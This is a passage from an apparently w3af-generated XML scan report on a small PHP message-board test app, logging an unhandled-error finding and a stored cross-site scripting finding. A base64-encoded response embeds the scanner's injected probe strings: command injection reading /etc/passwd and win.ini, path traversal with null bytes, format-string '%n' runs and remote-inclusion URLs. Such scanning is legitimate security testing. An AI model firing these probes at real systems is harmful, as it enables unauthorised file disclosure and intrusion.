                    <status>GET http://10.12.68.43:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;Type your pseudonyme and message!&lt;/p&gt;
    &lt;form action='/post' method='post'&gt;
        &lt;input type='text' name='pseudo' /&gt;
        &lt;input type='textarea' name='message' /&gt;
        &lt;input type='submit' value='ok' /&gt;
    &lt;/form&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="292">
                <http-request>
                    <status>GET http://10.12.68.43:31337/os2mfcpU HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="316">
                <http-request>
                    <status>GET http://10.12.68.43:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[252, 292, 360]" method="GET" name="Unhandled error in web application" plugin="generic" severity="Low" url="http://10.12.68.43:31337/" var="token">
        <description>An unhandled error, which could potentially translate to a vulnerability, was found at: &quot;http://10.12.68.43:31337/&quot;, using HTTP method GET. The modified parameter was the URL filename, with value: &quot;&quot;.</description>
        <long-description>Information Leakage is an application weakness where an application reveals sensitive data, such as technical details of the web application, environment, or user-specific data. Sensitive data may be used by an attacker to exploit the target web application, its hosting network, or its users. 

 In its most common form, information leakage is the result of one or more of the following conditions:
 * A failure to scrub out HTML/Script comments containing sensitive information
 * Improper application or server configurations
 * Improper application error handling
</long-description>
        <fix-guidance> * Ensure that the application source handles exceptions and errors in a such a way that no sensitive information is disclosed to the users
 * Configure the application server to handle and log any exceptions that the application might yield
</fix-guidance>
        <fix-effort>60</fix-effort>
        <references>
            <reference title="WASC threat classification" url="http://projects.webappsec.org/w/page/13246936/Information%20Leakage"/>
        </references>
        <http-transactions>
            <http-transaction id="252">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;Type your pseudonyme and message!&lt;/p&gt;
    &lt;form action='/post' method='post'&gt;
        &lt;input type='text' name='pseudo' /&gt;
        &lt;input type='textarea' name='message' /&gt;
        &lt;input type='submit' value='ok' /&gt;
    &lt;/form&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="292">
                <http-request>
                    <status>GET http://10.12.68.43:31337/os2mfcpU HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="360">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[770, 1175]" method="POST" name="Persistent Cross-Site Scripting vulnerability" plugin="xss" severity="High" url="http://10.12.68.43:31337/post" var="pseudo">
        <description>A persistent Cross Site Scripting vulnerability was found by sending &quot;50igi&lt;/-&gt;&quot; to the &quot;pseudo&quot; parameter at http://10.12.68.43:31337/post, which is echoed when browsing to http://10.12.68.43:31337/.</description>
        <long-description>Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction. 

 Cross Site Scripting (XSS) allows clients to inject arbitrary scripting code into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or encoding. 

 Persistent Cross Site Scripting vulnerabilities occur when the application stores user controlled information and then uses it to render HTTP response bodies to other clients. 

 This type of vulnerability can be used by a cyber-criminal to perform session hijacking, phishing or denial of service attacks against other web application users.</long-description>
        <fix-guidance>To remedy XSS vulnerabilities, it is important to never use untrusted or unfiltered data within the code of a HTML page. 

 Untrusted data can originate not only form the client but potentially a third party or previously uploaded file etc. Filtering of untrusted data typically involves converting special characters to their HTML entity encoded counterparts (however, other methods do exist, see references). These special characters include: 

 * `&amp;`
 * `&lt;`
 * `&gt;`
 * `&quot;`
 * `'`
 * `/`
 

 An example of HTML entity encoding is converting `&lt;` to `&amp;lt;`. Although it is possible to filter untrusted input, there are five locations within an HTML page where untrusted input (even if it has been filtered) should never be placed: 

 1. Directly in a script.
 2. Inside an HTML comment.
 3. In an attribute name.
 4. In a tag name.
 5. Directly in CSS.
 

 Each of these locations have their own form of escaping and filtering. 

 _Because many browsers attempt to implement XSS protection, any manual verification of this finding should be conducted using multiple different browsers and browser versions._</fix-guidance>
        <fix-effort>10</fix-effort>
        <references>
            <reference title="WASC" url="http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting"/>
            <reference title="Secunia" url="http://secunia.com/advisories/9716/"/>
            <reference title="ha.ckers" url="http://ha.ckers.org/xss.html"/>
            <reference title="OWASP" url="https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet"/>
        </references>
        <http-transactions>
            <http-transaction id="770">
                <http-request>
                    <status>POST http://10.12.68.43:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="44" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01MGlnaSUzQyUyRi0lM0U=
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">Message added successfullygo back to &lt;a href='/'&gt;messages&lt;/a&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="1175">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="base64">ICAgIDxwPjxhIGhyZWY9Jy9wb3N0Jz5sZWF2ZSBhIG1lc3NhZ2UhPC9hPjwvcD4KICAgIDxociAv
PgogICAgICAgIDxwPm1hbm55PC9wPgogICAgICAgIDxwPmJlYXV0aWZ1bCB3ZWJzaXRlITwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD5tYW5ueTwvcD4KICAgICAgICA8cD5pJ3ZlIGdvdCBu
b3RoaW5nIGVsc2UgdG8gZG88L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+PC9wPgogICAg
ICAgIDxwPjwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5I
ZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5SZXNwb25zZS5Xcml0ZShu
ZXcgU3RyaW5nPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgog
ICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPlJlc3BvbnNlLldyaXRlKG5ldyBTdHJpbmcoImhy
c2ZmIiw1KSk8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+L2Jpbi9jYXQgL2V0Yy9wYXNz
d2Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+L2Jpbi9jYXQgL2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+dHlwZSAlU1lTVEVNUk9PVCV3aW4uaW5pPC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PnR5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4m
Ji9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPiYmL2Jpbi9jYXQgL2V0Yy9w
YXNzd2Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+JiZ0eXBlICVTWVNURU1ST09UJXdp
bi5pbjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD41NjwvcD4KICAgICAgICA8cD4mJnR5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD58L2Jpbi9jYXQgL2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAg
PHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+fC9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PjU2PC9wPgogICAgICAgIDxwPnx0eXBlICVTWVNURU1ST09UJXdpbi5pbmk8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+fHR5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8
cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD47L2Jpbi9jYXQgL2V0
Yy9wYXNzd2Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+Oy9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjt0eXBlICVTWVNURU1ST09UJXdpbi5pbmk8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+O3R5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD5gL2Jpbi9jYXQgL2V0Yy9wYXNzd2RgPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxk
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnJ1biB0eXBlICVTWVNURU1ST09UJXdpbi48
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+YC9iaW4vY2F0IC9ldGMvcGFzc3dkYDwvcD4KICAgICAgICA8aHIg
Lz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5ydW4gdHlwZSAlU1lTVEVNUk9PVCV3aW4u
aW5pPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjAzNDEzNzE2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnBvc3Q8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+cG9zdDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD42Mjg5MDA3MjwvcD4K
ICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4uLi8u
Li8uLi8uLi8uLi8uLi8uLi8uLi8uPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi4uLy4uLy4uLy4uLy4uLy4u
Ly4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLjwvcD4KICAgICAgICA8cD5IZWxs
byBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4u
Li8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkADwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uPC9w
PgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2
PC9wPgogICAgICAgIDxwPi4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4u
Ly4uL2V0Yy9wYXNzd2QALmh0bWw8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+L2V0Yy9w
YXNzd2Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+L2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+L2V0Yy9wYXNzd2QAPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi9ldGMvcGFzc3dkADwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD4vZXRjL3Bhc3N3ZAAuaHRtbDwvcD4KICAgICAgICA8
cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD48L3A+CiAgICAgICAg
PHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+L2V0Yy9wYXNzd2QALmh0bWw8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+Li4v
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4uLi8uLi8uLi8uLi8uLi8u
Li8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ib290LmluaQA8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLjwvcD4KICAgICAgICA8cD5IZWxs
byBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4u
Li8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ib290LmluaQAuaHRt
bDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5DOghvb3QuaW5pPC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkM6CG9vdC5pbmk8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+QzoIb290LmluaQA8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+QzoIb290LmluaQA8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+QzoIb290LmluaQAuaHRtbDwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAg
ICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5DOghvb3QuaW5pAC5odG1sPC9w
PgogICAgICAgIDxociAvPgogICAgICAgIDxwPiVTWVNURU1ST09UJXdpbi5pbmk8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+JVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD4lU1lTVEVNUk9PVCV3aW4uaW5pADwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4lU1lTVEVNUk9PVCV3aW4u
aW5pADwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4lU1lTVEVNUk9PVCV3aW4uaW5pAC5o
dG1sPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAg
IDxwPjU2PC9wPgogICAgICAgIDxwPiVTWVNURU1ST09UJXdpbi5pbmkALmh0bWw8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+T1FWY0RwNXY8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+YSkvKS8pLykvKS8pLykvKS8pLykvKS8pLzwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41
NjwvcD4KICAgICAgICA8cD5hKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8p
LykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykv
KS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8p
LykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS88L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+aFR0cDovL3czYWYub3JnLzwvcD4KICAgICAgICA8cD5IZWxs
byBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5o
VHRwOi8vdzNhZi5vcmcvPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPmh0VHBzOi8vdzNh
Zi5vcmcvPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAg
ICAgIDxwPjU2PC9wPgogICAgICAgIDxwPmh0VHBzOi8vdzNhZi5vcmcvPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPmZUcDovL3czYWYub3JnLzwvcD4KICAgICAgICA8cD5IZWxsbyBXb3Js
ZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5mVHA6Ly93
M2FmLm9yZy88L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+
SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAg
PHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+TklSRVdKdnY8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+JW48L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+JW48L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+JW4lbiVuJW4lbiVu
JW4lbiVuJW48L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+JW4lbiVuJW4lbiVuJW4lbiVuJW48L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+JW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJTwvcD4KICAgICAg
ICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4lbiVuJW4lbiVu
JW4lbiVuJW4lbiVuJW4lPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4l
biVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVu
JW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4l
biVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVu
JW4lbiVuPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPiVu
JW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPl4oIyQhQCMkKSgoKSkpKioqKioqPC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPl4oIyQhQCMkKSgoKSkpKioqKioqPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPmh0
dHA6Ly93d3cudzNhZi5vcmcvPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPmh0dHA6Ly93d3cudzNhZi5vcmcv
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPi8vdzNhZi5vcmc8L3A+CiAgICAgICAgPHA+
SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+cGluZyAtbiA0IGxvY2Fs
aG9zdDwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD41NjwvcD4KICAgICAgICA8cD4vL3czYWYub3JnPC9wPgogICAgICAgIDxociAvPgogICAg
ICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgog
ICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPjwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
